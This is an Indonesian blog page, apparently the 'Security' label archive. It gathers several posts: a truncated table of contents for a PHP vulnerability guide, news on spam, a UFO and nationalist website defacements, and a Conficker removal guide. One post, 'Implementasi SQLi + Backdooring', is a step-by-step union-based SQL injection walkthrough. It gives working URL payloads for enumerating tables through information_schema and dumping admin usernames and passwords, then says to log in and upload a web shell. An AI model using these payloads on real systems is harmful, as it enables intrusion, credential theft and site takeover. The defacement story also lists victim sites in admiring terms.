Tampilkan postingan dengan label Security. Tampilkan semua postingan
Tampilkan postingan dengan label Security. Tampilkan semua postingan

Finding vulnerabilities in PHP scripts FULL

Author : SirGod
Email : sirgod08@gmail.com
Contents : 

 1) About
 2) Some stuff
 3) Remote File Inclusion
    3.0 - Basic example
 3.1 - Simple example
 3.2 - How to fix
 4) Local File Inclusion
    4.0 - Basic example
 4.1 - Simple example
 4.2 - How to fix
 5) Local File Disclosure/Download

Ahli Komputer Rentan Kecelakaan Kendaraan Bermotor

 LONDON - Entah karena dipusingkan dengan pekerjaannya yang setiap hari harus berhadapan dengan komputer. Para ahli komputer disebut sebagai kelompok profesi yang paling buruk dalam berkendara.
Sementara itu, petani merupakan profesi yang paling aman dalam berkendara. Hal itu, didasarkan pada banyaknya klaim asuransi oleh para ahli komputer di Churchill Car Insurance.

"Pengalaman telah membuktikan jika ahli komputer, sales manager dan dokter telah bekerja selama berjam-jam, sehingga mereka mudah lelah dan menyebabkan cara berkendaranya menjadi buruk," ujar kepala Tony Chilcott, head of Churchill Car Insurance, seperti dilansir Telegraph, Selasa (8/9/2009).

Hong Kong Terkepung Spam



HONG KONG - Serangan spam email ke Hong Kong makin lama kian mengkhawatirkan, bahkan dalam sebuah catatan laporan menyebutkan, akibat kepungan spam, negara tersebut mengalami kerugian hingga jutaan dolar per tahunnya.

Hingga beberapa tahun terakhir, setidaknya ada sekitar 4.000 spam yang berafiliasi dengan virus zombie, yang aktif di Hong Kong. Dan biasanya dalang kriminal dunia maya tersebut menggunakannya untuk mengirimkan ribuan pesan yang menawarkan produk mulai dari perhiasan hingga pornografi.

Menurut data yang dilansir perusahaan keamanan internet MessafeLab, yang dikutip melalui AFP, Jumat (11/9/2009), bahwa sebanyak 81,3 persen email di Hong Kong yang dikirimkan ke komputer adalah berbentuk spam. Angka tersebut, tentunya merupakan yang paling besar dibandingkan ibu kota negara lain.

UFO Terlihat di China

Kali ini bukti sangat kuat, ketika pesawat UFO berbentuk telur melintas. Berdasarkan berita di TV China, ilmuan dan beberapa pelajar yang sedang mengamati gerhana matahari.


Para Ilmuan sedang berada di tempat observasi Nanjing mengatakan mereka benar benar memiliki bukti dan merekam sebuah UFO yang melintas.


Pengambilan gambar secara tidak sengaja dilakukan di tempat observasi lintasan matahari pada 22 Juli. Peneliti menemukan sebuah objek tidak dikenal dekat matahari. Di sisi lain adanya gambar yang membuktikan UFO tersebut melintas, diambil oleh kamera saku.



Implementasi SQLi + Backdooring

Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'


---->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

sehingga muncul error atau hilang pesan error...
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--


--->>> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,2,3,4--

ok, keluar angka
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada angka yg keluar tadi.
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


--->>> 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"


--->>> 5
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--


--->>> 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang :D

ket: 0x3a sama dengan : <- titik dua


--->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY........ :D


-------------
Thax to:

Allah SWT
Muhammad SAW
All them
-------------


Wassalam

vYc0d

50 Situs Malaysia Dikerjai Hacker Indonesia

JAKARTA - Serangan oleh beberapa hacker asal Indonesia terhadap beberapa situs Malaysia ternyata berhasil didokumentasikan di sebuah situs. Serangan ini terkait dengan Cyber War yang telah dilancarkan antar kedua negara yaitu Indonesia dan Malaysia dalam beberapa waktu belakangan.

Nampak di situs tersebut, puluhan screen shoot situs Malaysia yang berhasil disusupi oleh kelompok hacker lokal, macam yadoy66, Tr1993r_m4ch1n3, ninj4_blu3, dan masih banyak lagi yang lainnya. Meskipun saat ditelusuri Okezone, Selasa (25/11/2008), ke semua situs tersebut telah berhasil dibetulkan.

Beberapa situs Malaysia yang berhasil disusupi di antaranya, adalah, http://5a.com.my/, http://imm.com.my/, http://eznet.com.my/, http://yccreative.com/, dan masih banyak lainnya.

Selain itu, pengelolanya pun telah menuliskan pesan di depan web mereka yang berisikan,

Hey Malingsial h4x0r
Jangan coba kau ganggu kami
Jangan kau coba merendahkan bangsa kami
Jangan sampai bendera perang berkibar kembali

And for you know
WE ARE READY FOR CYBERNATIC WAR

Aksi beberapa kelompok hacker ini merupakan bentuk balas dendam yang dilakukan oleh hacker asal negeri jiran yang bernama alien crew karena telah melakukan deface pada beberapa situs di Indonesia dengan tampilan 'Hacked by Anti Indon'.

Di tempat lain, kelompok yang menamakan dirinya Yogyacarderlink juga merusak situs perpustakaan milik Universiti Utara Malaysia dengan URL http://cmslib.uum.edu.my/psb/.

Akan tetapi, tidak seperti aksi sebelumnya, mereka hanya masuk lewat server yang 'berlubang', yang sudah pasti kehadiran mereka hanya dapat diketahui oleh orang tertentu, dan pihak admin saja.

Tidak lupa, foto siluet khas mereka terpampang jelas bersama bendera Indonesia dengan pesan yang berisi 'Salam Piss dan Love by: Indonesia Hacker". (srn)

Sumber : okezone.com

Mengenal Virus Conflicker


Virus Downadup sudah menjangkiti jutaan komputer di seluruh dunia. Ia menulari komputer melalui password jaringan, software Windows yang belum di-patch, dan terutama melalui USB stick. Karena virus ini dapat men-disable auto update dari Microsoft dan perusahaan-perusahaan anti virus, maka sistem kekebalan komputer Anda menjadi lemah dan rentan terhadap serangan-serangan dari luar.

Bagaimana mengetahui apakah komputer kita sudah terserang virus ini?
Biasanya setelah men-scan komputer dengan anti virus, kita akan mendapati warning yang menyatakan bahwa komputer kita sudah terinfeksi oleh Downadup, Kido, atau Conficker, yang biasanya disebutkan dengan nama-nama sebagai berikut:
• Net-Worm.Win32.Kido
• W32/Conficker.worm.gen
• Worm.Conficker
• W32.Downadup
• W32/Downadup.AL
• W32/Confick-A
• Win32/Conficker.A
• Mal/Conficker

Lalu terjadi connection dan Windows Errors, antara lain:
• Auto update dari Microsoft dan auto update anti virus berulang kali gagal
• Tidak dapat meng-update Windows Defender
• Munculnya random errors “svchost”
• Tidak dapat browsing ke situs-situs yang menyediakan penangkal untuk virus ini (misalnya tidak bisa browsing ke www.microsoft.com)
Selain itu, layanan-layanan Windows tidak dapat bekerja, misalnya:
• wuauserv: Windows Automatic Update Service
• BITS: Background Intelligent Transfer Service
• wscsvc: Windows Security Center Service
• WinDefend: Windows Defender Service
• ERSvc: Windows Error Reporting Service
• WerSvc: Windows Error Reporting Service

Bagaimana cara penyebaran virus ini?
Virus ini menyebar dengan empat cara, yaitu:
• Dengan mengeksploitasi PC Windows yang belum di-patch yang terhubung pada suatu jaringan
• Dengan serangan “brute force dictionary” terhadap password administrator yang menggunakan password yang lemah
• Dengan menginfeksi removable drive stick (thumb drive)
• Dengan menggunakan Windows scheduled tasks dan Autorun untuk menginfeksi ulang PC yang sudah dibersihkan dengan anti virus (makanya, jangan keburu senang jika anti virus kita menyatakan bahwa komputer kita sudah bersih, karena setelah re-start, virus tersebut akan hadir lagi jika dilakukan scan ulang)

Setelah mengenai komputer, maka virus ini akan:
• Menggandakan diri ke dalam folder system Windows (misalnya C:\\Windows\System 32)
• Mengubah registry Windows
• Mengganti akses klik kanan dan registry keys supaya pengguna tidak dapat mengubah dan menghapusnya
• Membuatnya mampu me-restart saat Windows di-start
• Menghubungi suatu situs dengan IP address umum (misalnya http://www.getmyip.org) untuk menemukan IP address komputer kita
• Mendownload versi-versi modifikasi dari virus itu sendiri dari sejumlah websites berdasarkan waktu dan tanggal yang sangat susah untuk diprediksi kapan akan terjadi
• Memulai sendiri web server pada random port dari PC kita untuk mendownload virus yang sudah dimodifikasi

Cara menanggulangi virus tersebut:
Pertama-tama, cobalah hilangkan virus tersebut dengan Microsoft Windows Malicious Software Removal Tool. Namun jika komputer kita telah terinfeksi virus ini, besar kemungkinan semua sites yang menjadi host tool ini sudah di-block olehnya. Maka kita dapat mendownloadnya secara gratis dari website Microsoft’s content distribution network di:
http://mscom-dlcecn.vo.llnwd.net/dow...90830-v2.6.exe
Untuk komputer berbasis Vista x64, Windows XP x64 and Windows 2003 x64, dapat mendownload tool tersebut secara gratis dari:
http://mscom-dlcecn.vo.llnwd.net/dow...0-x64-v2.6.exe
Jika Windows tool tersebut gagal, kita juga dapat mencoba menggunakan K7 Antivirus atau K7 Computing Free Virus Removal Tool. Karena domain-nya juga sudah di-block oleh si virus, gunakan link di bawah ini untuk mendownloadnya:
http://70.32.74.100/tools/k7downadupremover.zip
Setelah instalasi, langkah-langkah yang dianjurkan untuk dilakukan adalah:
• Meng-update versi terbaru dari tool ini
• Me-restart Windows di safe mode
• Menjalankan full system scan
• Menghapus semua file yang sudah terinfeksi virus ini
• Re-start Windows dalam normal mode
Fix Windows Registry
Virus ini, seperti layaknya jenis-jenis virus lainnya, selalu momodifikasi Windows Registry. Maka jangan lupa untuk men-scan dan mem-fix Windows Registry dengan Regcure/Mindsoft Utilities/RegDefense atau tools sejenisnya.
Setelah fixing windows registry, disarankan untuk selalu meng-update Windows Anda.

Disable AutoRun and AutoPlay
Sangat dianjurkan untuk men-disable AutoRun dan Auto{lay untuk menghindari infeksi virus sejenis di masa mendatang.
AutoRun dan AutoPlayadalah salah satu feauture default dari Windows yang memungkinkan media dan devices untuk meluncurkan program dengan menggunakan perintah-perintah terdaftar di “autorun.inf” yang tersimpan di medium’s root directory. Para pencipta malware sangat menyukai AutoRun dan AutoPlay karena susah untuk di-disable dan mudah untuk dieksploitasi.
Untuk men-disable AutoRun dan AutoPlay secara cepat dan mudah, kita dapat melakukannya dengan cara:
• Mendownload secara gratis tool DisableAuto 0.2 (Softpedia) secara gratis dari website http://www.softpedia.com/get/Tweak/R...ableAuto.shtml
• Unzip file-nya. Maka akan muncul sebuah reg file yang disebut “disableauto.reg”
• Double klik Reg file tersebut untuk memodifikasi Registry
• Reboot Windows. Sekarang AutoPlay dan AutoRun sudah dalam status disabled. Tapi kita masih bisa meng-akses dan menjalankan semua media secara manual.

Selamat mencoba, semoga berhasil.

Diintisarikan dan diterjemahkan dari sumber: www.downadup.com. Untuk informasi yang lebih lengkap dan mendetail, silakan kunjungi situs tersebut.

Pengikut

Rilis Sabily

Rilis Ubuntu

The next version of Ubuntu is coming soon

Nganjuk Online ©Template Blogger Green by Dicas Blogger.

KEMBALI KEATAS